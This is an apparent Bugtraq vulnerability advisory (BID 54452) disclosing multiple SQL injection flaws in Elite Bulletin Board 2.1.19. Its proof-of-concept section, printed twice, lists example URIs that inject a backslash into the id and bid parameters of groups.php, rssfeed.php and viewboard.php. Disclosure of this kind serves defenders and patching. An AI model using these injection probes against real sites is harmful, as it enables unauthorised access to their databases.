Elite Bulletin Board Multiple SQL Injection Vulnerabilities
BID:54452
Info
Elite Bulletin Board Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 54452 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 15 2012 12:00AM |
| Updated: | Jul 15 2012 12:00AM |
| Credit: | Toxic. |
| Vulnerable: |
Elite Bulletin Board Elite Bulletin Board 2.1.19 |
| Not Vulnerable: | |
Exploit / POC
Elite Bulletin Board Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/ebbv2/groups.php?id=%5c&mode=view
http://www.example.com/ebbv2/rssfeed.php?bid=%5c
http://www.example.com/ebbv2/viewboard.php?bid=%5c
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/ebbv2/groups.php?id=%5c&mode=view
http://www.example.com/ebbv2/rssfeed.php?bid=%5c
http://www.example.com/ebbv2/viewboard.php?bid=%5c